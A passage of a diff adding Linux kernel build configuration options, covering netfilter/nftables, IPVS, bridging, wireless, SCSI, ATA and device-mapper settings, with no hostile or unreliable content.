+CONFIG_NF_CONNTRACK_H323=y
+CONFIG_NF_CONNTRACK_IRC=y
+CONFIG_NF_CONNTRACK_BROADCAST=y
+CONFIG_NF_CONNTRACK_NETBIOS_NS=y
+CONFIG_NF_CONNTRACK_SNMP=y
+CONFIG_NF_CONNTRACK_PPTP=y
+CONFIG_NF_CONNTRACK_SANE=y
+CONFIG_NF_CONNTRACK_SIP=y
+CONFIG_NF_CONNTRACK_TFTP=y
+CONFIG_NF_CT_NETLINK=y
+CONFIG_NF_CT_NETLINK_TIMEOUT=y
+CONFIG_NF_CT_NETLINK_HELPER=y
+CONFIG_NETFILTER_NETLINK_GLUE_CT=y
+CONFIG_NF_NAT=y
+CONFIG_NF_NAT_NEEDED=y
+CONFIG_NF_NAT_PROTO_DCCP=y
+CONFIG_NF_NAT_PROTO_UDPLITE=y
+CONFIG_NF_NAT_PROTO_SCTP=y
+CONFIG_NF_NAT_AMANDA=y
+CONFIG_NF_NAT_FTP=y
+CONFIG_NF_NAT_IRC=y
+CONFIG_NF_NAT_SIP=y
+CONFIG_NF_NAT_TFTP=y
+CONFIG_NF_NAT_REDIRECT=y
+CONFIG_NETFILTER_SYNPROXY=y
+CONFIG_NF_TABLES=y
+CONFIG_NF_TABLES_NETDEV=y
+CONFIG_NFT_EXTHDR=y
+CONFIG_NFT_META=y
+CONFIG_NFT_NUMGEN=y
+CONFIG_NFT_CT=y
+CONFIG_NFT_SET_RBTREE=y
+CONFIG_NFT_SET_HASH=y
+CONFIG_NFT_COUNTER=y
+CONFIG_NFT_LOG=y
+CONFIG_NFT_LIMIT=y
+CONFIG_NFT_MASQ=y
+CONFIG_NFT_REDIR=y
+CONFIG_NFT_NAT=y
+CONFIG_NFT_QUEUE=y
+CONFIG_NFT_QUOTA=y
+CONFIG_NFT_REJECT=y
+# CONFIG_NFT_COMPAT is not set
+CONFIG_NFT_HASH=y
+CONFIG_NF_DUP_NETDEV=y
+CONFIG_NFT_DUP_NETDEV=y
+CONFIG_NFT_FWD_NETDEV=y
+CONFIG_NETFILTER_XTABLES=y
+
+#
+# Xtables combined modules
+#
+CONFIG_NETFILTER_XT_MARK=y
+CONFIG_NETFILTER_XT_CONNMARK=y
+CONFIG_NETFILTER_XT_SET=y
+
+#
+# Xtables targets
+#
+CONFIG_NETFILTER_XT_TARGET_CHECKSUM=y
+CONFIG_NETFILTER_XT_TARGET_CLASSIFY=y
+CONFIG_NETFILTER_XT_TARGET_CONNMARK=y
+CONFIG_NETFILTER_XT_TARGET_CONNSECMARK=y
+CONFIG_NETFILTER_XT_TARGET_CT=y
+CONFIG_NETFILTER_XT_TARGET_DSCP=y
+CONFIG_NETFILTER_XT_TARGET_HL=y
+CONFIG_NETFILTER_XT_TARGET_HMARK=y
+CONFIG_NETFILTER_XT_TARGET_IDLETIMER=y
+CONFIG_NETFILTER_XT_TARGET_LED=y
+CONFIG_NETFILTER_XT_TARGET_LOG=y
+CONFIG_NETFILTER_XT_TARGET_MARK=y
+CONFIG_NETFILTER_XT_NAT=y
+CONFIG_NETFILTER_XT_TARGET_NETMAP=y
+CONFIG_NETFILTER_XT_TARGET_NFLOG=y
+CONFIG_NETFILTER_XT_TARGET_NFQUEUE=y
+CONFIG_NETFILTER_XT_TARGET_NOTRACK=y
+CONFIG_NETFILTER_XT_TARGET_RATEEST=y
+CONFIG_NETFILTER_XT_TARGET_REDIRECT=y
+CONFIG_NETFILTER_XT_TARGET_TEE=y
+CONFIG_NETFILTER_XT_TARGET_TPROXY=y
+CONFIG_NETFILTER_XT_TARGET_TRACE=y
+CONFIG_NETFILTER_XT_TARGET_SECMARK=y
+CONFIG_NETFILTER_XT_TARGET_TCPMSS=y
+CONFIG_NETFILTER_XT_TARGET_TCPOPTSTRIP=y
+
+#
+# Xtables matches
+#
+CONFIG_NETFILTER_XT_MATCH_ADDRTYPE=y
+CONFIG_NETFILTER_XT_MATCH_BPF=y
+CONFIG_NETFILTER_XT_MATCH_CGROUP=y
+CONFIG_NETFILTER_XT_MATCH_CLUSTER=y
+CONFIG_NETFILTER_XT_MATCH_COMMENT=y
+CONFIG_NETFILTER_XT_MATCH_CONNBYTES=y
+CONFIG_NETFILTER_XT_MATCH_CONNLABEL=y
+CONFIG_NETFILTER_XT_MATCH_CONNLIMIT=y
+CONFIG_NETFILTER_XT_MATCH_CONNMARK=y
+CONFIG_NETFILTER_XT_MATCH_CONNTRACK=y
+CONFIG_NETFILTER_XT_MATCH_CPU=y
+CONFIG_NETFILTER_XT_MATCH_DCCP=y
+CONFIG_NETFILTER_XT_MATCH_DEVGROUP=y
+CONFIG_NETFILTER_XT_MATCH_DSCP=y
+CONFIG_NETFILTER_XT_MATCH_ECN=y
+CONFIG_NETFILTER_XT_MATCH_ESP=y
+CONFIG_NETFILTER_XT_MATCH_GRADM=y
+CONFIG_NETFILTER_XT_MATCH_HASHLIMIT=y
+CONFIG_NETFILTER_XT_MATCH_HELPER=y
+CONFIG_NETFILTER_XT_MATCH_HL=y
+CONFIG_NETFILTER_XT_MATCH_IPCOMP=y
+CONFIG_NETFILTER_XT_MATCH_IPRANGE=y
+CONFIG_NETFILTER_XT_MATCH_IPVS=y
+CONFIG_NETFILTER_XT_MATCH_L2TP=y
+CONFIG_NETFILTER_XT_MATCH_LENGTH=y
+CONFIG_NETFILTER_XT_MATCH_LIMIT=y
+CONFIG_NETFILTER_XT_MATCH_MAC=y
+CONFIG_NETFILTER_XT_MATCH_MARK=y
+CONFIG_NETFILTER_XT_MATCH_MULTIPORT=y
+CONFIG_NETFILTER_XT_MATCH_NFACCT=y
+CONFIG_NETFILTER_XT_MATCH_OSF=y
+CONFIG_NETFILTER_XT_MATCH_OWNER=y
+CONFIG_NETFILTER_XT_MATCH_POLICY=y
+CONFIG_NETFILTER_XT_MATCH_PHYSDEV=y
+CONFIG_NETFILTER_XT_MATCH_PKTTYPE=y
+CONFIG_NETFILTER_XT_MATCH_QUOTA=y
+CONFIG_NETFILTER_XT_MATCH_RATEEST=y
+CONFIG_NETFILTER_XT_MATCH_REALM=y
+CONFIG_NETFILTER_XT_MATCH_RECENT=y
+CONFIG_NETFILTER_XT_MATCH_SCTP=y
+CONFIG_NETFILTER_XT_MATCH_SOCKET=y
+CONFIG_NETFILTER_XT_MATCH_STATE=y
+CONFIG_NETFILTER_XT_MATCH_STATISTIC=y
+CONFIG_NETFILTER_XT_MATCH_STRING=y
+CONFIG_NETFILTER_XT_MATCH_TCPMSS=y
+CONFIG_NETFILTER_XT_MATCH_TIME=y
+CONFIG_NETFILTER_XT_MATCH_U32=y
+CONFIG_IP_SET=y
+CONFIG_IP_SET_MAX=256
+CONFIG_IP_SET_BITMAP_IP=y
+CONFIG_IP_SET_BITMAP_IPMAC=y
+CONFIG_IP_SET_BITMAP_PORT=y
+CONFIG_IP_SET_HASH_IP=y
+CONFIG_IP_SET_HASH_IPMARK=y
+CONFIG_IP_SET_HASH_IPPORT=y
+CONFIG_IP_SET_HASH_IPPORTIP=y
+CONFIG_IP_SET_HASH_IPPORTNET=y
+CONFIG_IP_SET_HASH_MAC=y
+CONFIG_IP_SET_HASH_NETPORTNET=y
+CONFIG_IP_SET_HASH_NET=y
+CONFIG_IP_SET_HASH_NETNET=y
+CONFIG_IP_SET_HASH_NETPORT=y
+CONFIG_IP_SET_HASH_NETIFACE=y
+CONFIG_IP_SET_LIST_SET=y
+CONFIG_IP_VS=y
+# CONFIG_IP_VS_DEBUG is not set
+CONFIG_IP_VS_TAB_BITS=12
+
+#
+# IPVS transport protocol load balancing support
+#
+CONFIG_IP_VS_PROTO_TCP=y
+CONFIG_IP_VS_PROTO_UDP=y
+CONFIG_IP_VS_PROTO_AH_ESP=y
+CONFIG_IP_VS_PROTO_ESP=y
+CONFIG_IP_VS_PROTO_AH=y
+CONFIG_IP_VS_PROTO_SCTP=y
+
+#
+# IPVS scheduler
+#
+# CONFIG_IP_VS_RR is not set
+# CONFIG_IP_VS_WRR is not set
+# CONFIG_IP_VS_LC is not set
+# CONFIG_IP_VS_WLC is not set
+# CONFIG_IP_VS_FO is not set
+# CONFIG_IP_VS_OVF is not set
+# CONFIG_IP_VS_LBLC is not set
+# CONFIG_IP_VS_LBLCR is not set
+# CONFIG_IP_VS_DH is not set
+# CONFIG_IP_VS_SH is not set
+# CONFIG_IP_VS_SED is not set
+# CONFIG_IP_VS_NQ is not set
+
+#
+# IPVS SH scheduler
+#
+CONFIG_IP_VS_SH_TAB_BITS=8
+
+#
+# IPVS application helper
+#
+# CONFIG_IP_VS_FTP is not set
+CONFIG_IP_VS_NFCT=y
+CONFIG_IP_VS_PE_SIP=y
+
+#
+# IP: Netfilter Configuration
+#
+CONFIG_NF_DEFRAG_IPV4=y
+CONFIG_NF_CONNTRACK_IPV4=y
+CONFIG_NF_TABLES_IPV4=y
+CONFIG_NFT_CHAIN_ROUTE_IPV4=y
+CONFIG_NFT_REJECT_IPV4=y
+CONFIG_NFT_DUP_IPV4=y
+CONFIG_NF_TABLES_ARP=y
+CONFIG_NF_DUP_IPV4=y
+CONFIG_NF_LOG_ARP=y
+CONFIG_NF_LOG_IPV4=y
+CONFIG_NF_REJECT_IPV4=y
+CONFIG_NF_NAT_IPV4=y
+CONFIG_NFT_CHAIN_NAT_IPV4=y
+CONFIG_NF_NAT_MASQUERADE_IPV4=y
+CONFIG_NFT_MASQ_IPV4=y
+CONFIG_NFT_REDIR_IPV4=y
+CONFIG_NF_NAT_SNMP_BASIC=y
+CONFIG_NF_NAT_PROTO_GRE=y
+CONFIG_NF_NAT_PPTP=y
+CONFIG_NF_NAT_H323=y
+CONFIG_IP_NF_IPTABLES=y
+CONFIG_IP_NF_MATCH_AH=y
+CONFIG_IP_NF_MATCH_ECN=y
+CONFIG_IP_NF_MATCH_RPFILTER=y
+CONFIG_IP_NF_MATCH_TTL=y
+CONFIG_IP_NF_FILTER=y
+CONFIG_IP_NF_TARGET_REJECT=y
+CONFIG_IP_NF_TARGET_SYNPROXY=y
+CONFIG_IP_NF_NAT=y
+CONFIG_IP_NF_TARGET_MASQUERADE=y
+CONFIG_IP_NF_TARGET_NETMAP=y
+CONFIG_IP_NF_TARGET_REDIRECT=y
+CONFIG_IP_NF_MANGLE=y
+CONFIG_IP_NF_TARGET_CLUSTERIP=y
+CONFIG_IP_NF_TARGET_ECN=y
+CONFIG_IP_NF_TARGET_TTL=y
+CONFIG_IP_NF_RAW=y
+CONFIG_IP_NF_SECURITY=y
+CONFIG_IP_NF_ARPTABLES=y
+CONFIG_IP_NF_ARPFILTER=y
+CONFIG_IP_NF_ARP_MANGLE=y
+CONFIG_NF_TABLES_BRIDGE=y
+CONFIG_NFT_BRIDGE_META=y
+CONFIG_NF_LOG_BRIDGE=y
+CONFIG_BRIDGE_NF_EBTABLES=y
+CONFIG_BRIDGE_EBT_BROUTE=y
+CONFIG_BRIDGE_EBT_T_FILTER=y
+CONFIG_BRIDGE_EBT_T_NAT=y
+CONFIG_BRIDGE_EBT_802_3=y
+CONFIG_BRIDGE_EBT_AMONG=y
+CONFIG_BRIDGE_EBT_ARP=y
+CONFIG_BRIDGE_EBT_IP=y
+CONFIG_BRIDGE_EBT_LIMIT=y
+CONFIG_BRIDGE_EBT_MARK=y
+CONFIG_BRIDGE_EBT_PKTTYPE=y
+CONFIG_BRIDGE_EBT_STP=y
+CONFIG_BRIDGE_EBT_VLAN=y
+CONFIG_BRIDGE_EBT_ARPREPLY=y
+CONFIG_BRIDGE_EBT_DNAT=y
+CONFIG_BRIDGE_EBT_MARK_T=y
+CONFIG_BRIDGE_EBT_REDIRECT=y
+CONFIG_BRIDGE_EBT_SNAT=y
+CONFIG_BRIDGE_EBT_LOG=y
+CONFIG_BRIDGE_EBT_NFLOG=y
+# CONFIG_IP_DCCP is not set
+# CONFIG_IP_SCTP is not set
+# CONFIG_RDS is not set
+# CONFIG_TIPC is not set
+# CONFIG_ATM is not set
+# CONFIG_L2TP is not set
+CONFIG_STP=y
+CONFIG_GARP=y
+CONFIG_MRP=y
+CONFIG_BRIDGE=y
+CONFIG_BRIDGE_IGMP_SNOOPING=y
+CONFIG_BRIDGE_VLAN_FILTERING=y
+CONFIG_HAVE_NET_DSA=y
+CONFIG_VLAN_8021Q=y
+CONFIG_VLAN_8021Q_GVRP=y
+CONFIG_VLAN_8021Q_MVRP=y
+# CONFIG_DECNET is not set
+CONFIG_LLC=y
+# CONFIG_LLC2 is not set
+# CONFIG_IPX is not set
+# CONFIG_ATALK is not set
+# CONFIG_X25 is not set
+# CONFIG_LAPB is not set
+# CONFIG_PHONET is not set
+# CONFIG_IEEE802154 is not set
+CONFIG_NET_SCHED=y
+
+#
+# Queueing/Scheduling
+#
+# CONFIG_NET_SCH_CBQ is not set
+# CONFIG_NET_SCH_HTB is not set
+# CONFIG_NET_SCH_HFSC is not set
+# CONFIG_NET_SCH_PRIO is not set
+# CONFIG_NET_SCH_MULTIQ is not set
+# CONFIG_NET_SCH_RED is not set
+# CONFIG_NET_SCH_SFB is not set
+# CONFIG_NET_SCH_SFQ is not set
+# CONFIG_NET_SCH_TEQL is not set
+# CONFIG_NET_SCH_TBF is not set
+# CONFIG_NET_SCH_GRED is not set
+# CONFIG_NET_SCH_DSMARK is not set
+# CONFIG_NET_SCH_NETEM is not set
+# CONFIG_NET_SCH_DRR is not set
+# CONFIG_NET_SCH_MQPRIO is not set
+# CONFIG_NET_SCH_CHOKE is not set
+# CONFIG_NET_SCH_QFQ is not set
+# CONFIG_NET_SCH_CODEL is not set
+# CONFIG_NET_SCH_FQ_CODEL is not set
+# CONFIG_NET_SCH_FQ is not set
+# CONFIG_NET_SCH_HHF is not set
+# CONFIG_NET_SCH_PIE is not set
+# CONFIG_NET_SCH_PLUG is not set
+
+#
+# Classification
+#
+# CONFIG_NET_CLS_BASIC is not set
+# CONFIG_NET_CLS_TCINDEX is not set
+# CONFIG_NET_CLS_ROUTE4 is not set
+# CONFIG_NET_CLS_FW is not set
+# CONFIG_NET_CLS_U32 is not set
+# CONFIG_NET_CLS_RSVP is not set
+# CONFIG_NET_CLS_RSVP6 is not set
+# CONFIG_NET_CLS_FLOW is not set
+# CONFIG_NET_CLS_CGROUP is not set
+# CONFIG_NET_CLS_BPF is not set
+# CONFIG_NET_CLS_FLOWER is not set
+# CONFIG_NET_CLS_MATCHALL is not set
+# CONFIG_NET_EMATCH is not set
+# CONFIG_NET_CLS_ACT is not set
+CONFIG_NET_SCH_FIFO=y
+# CONFIG_DCB is not set
+# CONFIG_DNS_RESOLVER is not set
+# CONFIG_BATMAN_ADV is not set
+# CONFIG_OPENVSWITCH is not set
+CONFIG_VSOCKETS=y
+CONFIG_VIRTIO_VSOCKETS=y
+CONFIG_VIRTIO_VSOCKETS_COMMON=y
+CONFIG_NETLINK_DIAG=y
+# CONFIG_MPLS is not set
+# CONFIG_HSR is not set
+# CONFIG_NET_SWITCHDEV is not set
+# CONFIG_NET_L3_MASTER_DEV is not set
+# CONFIG_NET_NCSI is not set
+CONFIG_RPS=y
+CONFIG_RFS_ACCEL=y
+CONFIG_XPS=y
+CONFIG_SOCK_CGROUP_DATA=y
+# CONFIG_CGROUP_NET_PRIO is not set
+CONFIG_CGROUP_NET_CLASSID=y
+CONFIG_NET_RX_BUSY_POLL=y
+CONFIG_BQL=y
+# CONFIG_BPF_JIT is not set
+CONFIG_NET_FLOW_LIMIT=y
+
+#
+# Network testing
+#
+CONFIG_NET_PKTGEN=y
+# CONFIG_NET_TCPPROBE is not set
+# CONFIG_HAMRADIO is not set
+# CONFIG_CAN is not set
+# CONFIG_IRDA is not set
+CONFIG_BT=y
+CONFIG_BT_BREDR=y
+# CONFIG_BT_RFCOMM is not set
+# CONFIG_BT_BNEP is not set
+# CONFIG_BT_HIDP is not set
+CONFIG_BT_HS=y
+CONFIG_BT_LE=y
+# CONFIG_BT_LEDS is not set
+# CONFIG_BT_SELFTEST is not set
+
+#
+# Bluetooth device drivers
+#
+# CONFIG_BT_HCIBTUSB is not set
+# CONFIG_BT_HCIBTSDIO is not set
+# CONFIG_BT_HCIUART is not set
+# CONFIG_BT_HCIBCM203X is not set
+# CONFIG_BT_HCIBFUSB is not set
+# CONFIG_BT_HCIVHCI is not set
+# CONFIG_BT_MRVL is not set
+# CONFIG_AF_RXRPC is not set
+# CONFIG_AF_KCM is not set
+# CONFIG_STREAM_PARSER is not set
+CONFIG_WIRELESS=y
+CONFIG_WEXT_CORE=y
+CONFIG_WEXT_PROC=y
+CONFIG_CFG80211=y
+CONFIG_NL80211_TESTMODE=y
+# CONFIG_CFG80211_DEVELOPER_WARNINGS is not set
+# CONFIG_CFG80211_CERTIFICATION_ONUS is not set
+CONFIG_CFG80211_DEFAULT_PS=y
+# CONFIG_CFG80211_INTERNAL_REGDB is not set
+CONFIG_CFG80211_CRDA_SUPPORT=y
+CONFIG_CFG80211_WEXT=y
+# CONFIG_LIB80211 is not set
+CONFIG_MAC80211=y
+CONFIG_MAC80211_HAS_RC=y
+CONFIG_MAC80211_RC_MINSTREL=y
+CONFIG_MAC80211_RC_MINSTREL_HT=y
+# CONFIG_MAC80211_RC_MINSTREL_VHT is not set
+CONFIG_MAC80211_RC_DEFAULT_MINSTREL=y
+CONFIG_MAC80211_RC_DEFAULT="minstrel_ht"
+# CONFIG_MAC80211_MESH is not set
+CONFIG_MAC80211_LEDS=y
+# CONFIG_MAC80211_MESSAGE_TRACING is not set
+# CONFIG_MAC80211_DEBUG_MENU is not set
+CONFIG_MAC80211_STA_HASH_MAX_SIZE=0
+# CONFIG_WIMAX is not set
+CONFIG_RFKILL=y
+CONFIG_RFKILL_LEDS=y
+# CONFIG_RFKILL_INPUT is not set
+# CONFIG_RFKILL_GPIO is not set
+# CONFIG_NET_9P is not set
+# CONFIG_CAIF is not set
+# CONFIG_CEPH_LIB is not set
+# CONFIG_NFC is not set
+# CONFIG_LWTUNNEL is not set
+CONFIG_DST_CACHE=y
+# CONFIG_NET_DEVLINK is not set
+CONFIG_MAY_USE_DEVLINK=y
+CONFIG_HAVE_EBPF_JIT=y
+
+#
+# Device Drivers
+#
+
+#
+# Generic Driver Options
+#
+# CONFIG_UEVENT_HELPER is not set
+CONFIG_DEVTMPFS=y
+CONFIG_DEVTMPFS_MOUNT=y
+CONFIG_STANDALONE=y
+# CONFIG_PREVENT_FIRMWARE_BUILD is not set
+CONFIG_FW_LOADER=y
+CONFIG_FIRMWARE_IN_KERNEL=y
+CONFIG_EXTRA_FIRMWARE="iwlwifi-3160-17.ucode"
+CONFIG_EXTRA_FIRMWARE_DIR="/lib/firmware"
+CONFIG_FW_LOADER_USER_HELPER=y
+CONFIG_FW_LOADER_USER_HELPER_FALLBACK=y
+CONFIG_WANT_DEV_COREDUMP=y
+CONFIG_ALLOW_DEV_COREDUMP=y
+CONFIG_DEV_COREDUMP=y
+# CONFIG_DEBUG_DRIVER is not set
+# CONFIG_DEBUG_DEVRES is not set
+# CONFIG_DEBUG_TEST_DRIVER_REMOVE is not set
+# CONFIG_SYS_HYPERVISOR is not set
+# CONFIG_GENERIC_CPU_DEVICES is not set
+CONFIG_GENERIC_CPU_AUTOPROBE=y
+CONFIG_REGMAP=y
+CONFIG_REGMAP_I2C=y
+CONFIG_REGMAP_SPI=y
+CONFIG_DMA_SHARED_BUFFER=y
+# CONFIG_FENCE_TRACE is not set
+
+#
+# Bus devices
+#
+CONFIG_CONNECTOR=y
+CONFIG_PROC_EVENTS=y
+# CONFIG_MTD is not set
+CONFIG_DTC=y
+CONFIG_OF=y
+CONFIG_OF_UNITTEST=y
+CONFIG_OF_FLATTREE=y
+CONFIG_OF_EARLY_FLATTREE=y
+CONFIG_OF_DYNAMIC=y
+CONFIG_OF_ADDRESS=y
+CONFIG_OF_ADDRESS_PCI=y
+CONFIG_OF_IRQ=y
+CONFIG_OF_NET=y
+CONFIG_OF_MDIO=y
+CONFIG_OF_PCI=y
+CONFIG_OF_PCI_IRQ=y
+CONFIG_OF_RESOLVE=y
+CONFIG_OF_OVERLAY=y
+CONFIG_ARCH_MIGHT_HAVE_PC_PARPORT=y
+# CONFIG_PARPORT is not set
+CONFIG_PNP=y
+# CONFIG_PNP_DEBUG_MESSAGES is not set
+
+#
+# Protocols
+#
+CONFIG_PNPACPI=y
+CONFIG_BLK_DEV=y
+# CONFIG_BLK_DEV_NULL_BLK is not set
+# CONFIG_BLK_DEV_FD is not set
+# CONFIG_BLK_DEV_PCIESSD_MTIP32XX is not set
+# CONFIG_ZRAM is not set
+# CONFIG_BLK_CPQ_CISS_DA is not set
+# CONFIG_BLK_DEV_DAC960 is not set
+# CONFIG_BLK_DEV_UMEM is not set
+# CONFIG_BLK_DEV_COW_COMMON is not set
+CONFIG_BLK_DEV_LOOP=y
+CONFIG_BLK_DEV_LOOP_MIN_COUNT=8
+CONFIG_BLK_DEV_CRYPTOLOOP=y
+# CONFIG_BLK_DEV_DRBD is not set
+CONFIG_BLK_DEV_NBD=y
+# CONFIG_BLK_DEV_SKD is not set
+# CONFIG_BLK_DEV_SX8 is not set
+CONFIG_BLK_DEV_RAM=y
+CONFIG_BLK_DEV_RAM_COUNT=16
+CONFIG_BLK_DEV_RAM_SIZE=4096
+# CONFIG_CDROM_PKTCDVD is not set
+# CONFIG_ATA_OVER_ETH is not set
+CONFIG_VIRTIO_BLK=y
+# CONFIG_BLK_DEV_HD is not set
+# CONFIG_BLK_DEV_RBD is not set
+# CONFIG_BLK_DEV_RSXX is not set
+# CONFIG_BLK_DEV_NVME is not set
+# CONFIG_NVME_TARGET is not set
+
+#
+# Misc devices
+#
+# CONFIG_SENSORS_LIS3LV02D is not set
+# CONFIG_AD525X_DPOT is not set
+# CONFIG_DUMMY_IRQ is not set
+# CONFIG_IBM_ASM is not set
+# CONFIG_PHANTOM is not set
+# CONFIG_SGI_IOC4 is not set
+# CONFIG_TIFM_CORE is not set
+# CONFIG_ICS932S401 is not set
+# CONFIG_ENCLOSURE_SERVICES is not set
+# CONFIG_HP_ILO is not set
+# CONFIG_APDS9802ALS is not set
+# CONFIG_ISL29003 is not set
+# CONFIG_ISL29020 is not set
+# CONFIG_SENSORS_TSL2550 is not set
+# CONFIG_SENSORS_BH1770 is not set
+# CONFIG_SENSORS_APDS990X is not set
+# CONFIG_HMC6352 is not set
+# CONFIG_DS1682 is not set
+# CONFIG_TI_DAC7512 is not set
+# CONFIG_USB_SWITCH_FSA9480 is not set
+# CONFIG_LATTICE_ECP3_CONFIG is not set
+CONFIG_SRAM=y
+# CONFIG_C2PORT is not set
+
+#
+# EEPROM support
+#
+# CONFIG_EEPROM_AT24 is not set
+# CONFIG_EEPROM_AT25 is not set
+# CONFIG_EEPROM_LEGACY is not set
+# CONFIG_EEPROM_MAX6875 is not set
+# CONFIG_EEPROM_93CX6 is not set
+# CONFIG_EEPROM_93XX46 is not set
+# CONFIG_CB710_CORE is not set
+
+#
+# Texas Instruments shared transport line discipline
+#
+# CONFIG_TI_ST is not set
+# CONFIG_SENSORS_LIS3_I2C is not set
+
+#
+# Altera FPGA firmware download module
+#
+# CONFIG_ALTERA_STAPL is not set
+CONFIG_INTEL_MEI=y
+CONFIG_INTEL_MEI_ME=y
+CONFIG_INTEL_MEI_TXE=y
+# CONFIG_VMWARE_VMCI is not set
+
+#
+# Intel MIC Bus Driver
+#
+# CONFIG_INTEL_MIC_BUS is not set
+
+#
+# SCIF Bus Driver
+#
+# CONFIG_SCIF_BUS is not set
+
+#
+# VOP Bus Driver
+#
+# CONFIG_VOP_BUS is not set
+
+#
+# Intel MIC Host Driver
+#
+
+#
+# Intel MIC Card Driver
+#
+
+#
+# SCIF Driver
+#
+
+#
+# Intel MIC Coprocessor State Management (COSM) Drivers
+#
+
+#
+# VOP Driver
+#
+# CONFIG_GENWQE is not set
+# CONFIG_ECHO is not set
+# CONFIG_CXL_BASE is not set
+# CONFIG_CXL_AFU_DRIVER_OPS is not set
+CONFIG_HAVE_IDE=y
+# CONFIG_IDE is not set
+
+#
+# SCSI device support
+#
+CONFIG_SCSI_MOD=y
+CONFIG_RAID_ATTRS=y
+CONFIG_SCSI=y
+CONFIG_SCSI_DMA=y
+CONFIG_SCSI_NETLINK=y
+# CONFIG_SCSI_MQ_DEFAULT is not set
+CONFIG_SCSI_PROC_FS=y
+
+#
+# SCSI support type (disk, tape, CD-ROM)
+#
+CONFIG_BLK_DEV_SD=y
+# CONFIG_CHR_DEV_ST is not set
+# CONFIG_CHR_DEV_OSST is not set
+CONFIG_BLK_DEV_SR=y
+# CONFIG_BLK_DEV_SR_VENDOR is not set
+CONFIG_CHR_DEV_SG=y
+# CONFIG_CHR_DEV_SCH is not set
+# CONFIG_SCSI_CONSTANTS is not set
+# CONFIG_SCSI_LOGGING is not set
+# CONFIG_SCSI_SCAN_ASYNC is not set
+
+#
+# SCSI Transports
+#
+CONFIG_SCSI_SPI_ATTRS=y
+CONFIG_SCSI_FC_ATTRS=y
+CONFIG_SCSI_ISCSI_ATTRS=y
+CONFIG_SCSI_SAS_ATTRS=y
+CONFIG_SCSI_SAS_LIBSAS=y
+# CONFIG_SCSI_SAS_ATA is not set
+CONFIG_SCSI_SAS_HOST_SMP=y
+# CONFIG_SCSI_SRP_ATTRS is not set
+CONFIG_SCSI_LOWLEVEL=y
+# CONFIG_ISCSI_TCP is not set
+CONFIG_ISCSI_BOOT_SYSFS=y
+# CONFIG_SCSI_CXGB3_ISCSI is not set
+# CONFIG_SCSI_CXGB4_ISCSI is not set
+# CONFIG_SCSI_BNX2_ISCSI is not set
+# CONFIG_BE2ISCSI is not set
+# CONFIG_BLK_DEV_3W_XXXX_RAID is not set
+# CONFIG_SCSI_HPSA is not set
+# CONFIG_SCSI_3W_9XXX is not set
+# CONFIG_SCSI_3W_SAS is not set
+# CONFIG_SCSI_ACARD is not set
+# CONFIG_SCSI_AACRAID is not set
+# CONFIG_SCSI_AIC7XXX is not set
+# CONFIG_SCSI_AIC79XX is not set
+# CONFIG_SCSI_AIC94XX is not set
+# CONFIG_SCSI_MVSAS is not set
+# CONFIG_SCSI_MVUMI is not set
+# CONFIG_SCSI_DPT_I2O is not set
+# CONFIG_SCSI_ADVANSYS is not set
+# CONFIG_SCSI_ARCMSR is not set
+# CONFIG_SCSI_ESAS2R is not set
+# CONFIG_MEGARAID_NEWGEN is not set
+# CONFIG_MEGARAID_LEGACY is not set
+# CONFIG_MEGARAID_SAS is not set
+# CONFIG_SCSI_MPT3SAS is not set
+# CONFIG_SCSI_MPT2SAS is not set
+# CONFIG_SCSI_SMARTPQI is not set
+# CONFIG_SCSI_UFSHCD is not set
+# CONFIG_SCSI_HPTIOP is not set
+# CONFIG_SCSI_BUSLOGIC is not set
+# CONFIG_VMWARE_PVSCSI is not set
+# CONFIG_LIBFC is not set
+# CONFIG_SCSI_SNIC is not set
+# CONFIG_SCSI_DMX3191D is not set
+CONFIG_SCSI_EATA=y
+# CONFIG_SCSI_EATA_TAGGED_QUEUE is not set
+# CONFIG_SCSI_EATA_LINKED_COMMANDS is not set
+CONFIG_SCSI_EATA_MAX_TAGS=16
+# CONFIG_SCSI_FUTURE_DOMAIN is not set
+# CONFIG_SCSI_GDTH is not set
+# CONFIG_SCSI_ISCI is not set
+# CONFIG_SCSI_IPS is not set
+# CONFIG_SCSI_INITIO is not set
+# CONFIG_SCSI_INIA100 is not set
+# CONFIG_SCSI_STEX is not set
+# CONFIG_SCSI_SYM53C8XX_2 is not set
+# CONFIG_SCSI_IPR is not set
+# CONFIG_SCSI_QLOGIC_1280 is not set
+# CONFIG_SCSI_QLA_FC is not set
+# CONFIG_SCSI_QLA_ISCSI is not set
+# CONFIG_SCSI_LPFC is not set
+# CONFIG_SCSI_DC395x is not set
+# CONFIG_SCSI_AM53C974 is not set
+# CONFIG_SCSI_WD719X is not set
+# CONFIG_SCSI_DEBUG is not set
+# CONFIG_SCSI_PMCRAID is not set
+# CONFIG_SCSI_PM8001 is not set
+# CONFIG_SCSI_BFA_FC is not set
+CONFIG_SCSI_VIRTIO=y
+# CONFIG_SCSI_CHELSIO_FCOE is not set
+# CONFIG_SCSI_DH is not set
+# CONFIG_SCSI_OSD_INITIATOR is not set
+CONFIG_ATA=y
+# CONFIG_ATA_NONSTANDARD is not set
+CONFIG_ATA_VERBOSE_ERROR=y
+CONFIG_ATA_ACPI=y
+# CONFIG_SATA_ZPODD is not set
+# CONFIG_SATA_PMP is not set
+
+#
+# Controllers with non-SFF native interface
+#
+CONFIG_SATA_AHCI=y
+CONFIG_SATA_AHCI_PLATFORM=y
+# CONFIG_AHCI_CEVA is not set
+# CONFIG_AHCI_QORIQ is not set
+# CONFIG_SATA_INIC162X is not set
+# CONFIG_SATA_ACARD_AHCI is not set
+# CONFIG_SATA_SIL24 is not set
+# CONFIG_ATA_SFF is not set
+CONFIG_MD=y
+CONFIG_BLK_DEV_MD=y
+CONFIG_MD_AUTODETECT=y
+CONFIG_MD_LINEAR=y
+CONFIG_MD_RAID0=y
+CONFIG_MD_RAID1=y
+CONFIG_MD_RAID10=y
+CONFIG_MD_RAID456=y
+CONFIG_MD_MULTIPATH=y
+# CONFIG_MD_FAULTY is not set
+# CONFIG_BCACHE is not set
+CONFIG_BLK_DEV_DM_BUILTIN=y
+CONFIG_BLK_DEV_DM=y
+# CONFIG_DM_MQ_DEFAULT is not set
+# CONFIG_DM_DEBUG is not set
+CONFIG_DM_BUFIO=y
+# CONFIG_DM_DEBUG_BLOCK_STACK_TRACING is not set
+CONFIG_DM_BIO_PRISON=y
+CONFIG_DM_PERSISTENT_DATA=y
+CONFIG_DM_CRYPT=y
+CONFIG_DM_SNAPSHOT=y
+CONFIG_DM_THIN_PROVISIONING=y
+# CONFIG_DM_CACHE is not set
+# CONFIG_DM_ERA is not set
